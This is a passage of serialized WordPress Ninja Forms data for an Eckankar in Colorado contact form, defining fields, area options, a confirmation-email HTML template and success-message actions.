dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:14:\"listselect_158\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:14:\"listselect_158\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:204;}i:6;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:43:\"Select The Person You Would Like To Contact\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:1:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:57:\"select_the_person_you_would_like_to_contact_1613166754232\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:14:\"listselect_161\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:207;}i:7;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_162\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_162\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:208;}i:8;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663800586504\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"632\";}i:9;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_164\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_164\";}s:2:\"id\";i:210;}i:10;a:2:{s:8:\"settings\";a:11:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"HTML\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663800583849\";}s:2:\"id\";s:3:\"633\";}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:41\";s:5:\"label\";s:9:\"Save Form\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:73;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:41\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_156}\";s:13:\"email_subject\";s:49:\"Northwest Mountain Area Initiators and ESAâs\";s:13:\"email_message\";s:3774:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_154},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Northwest Mountain Area ECK Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_154}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_155}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_156}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_157}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_158}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166754232}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_162}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:74;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:41\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:11:\"success_msg\";s:361:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms 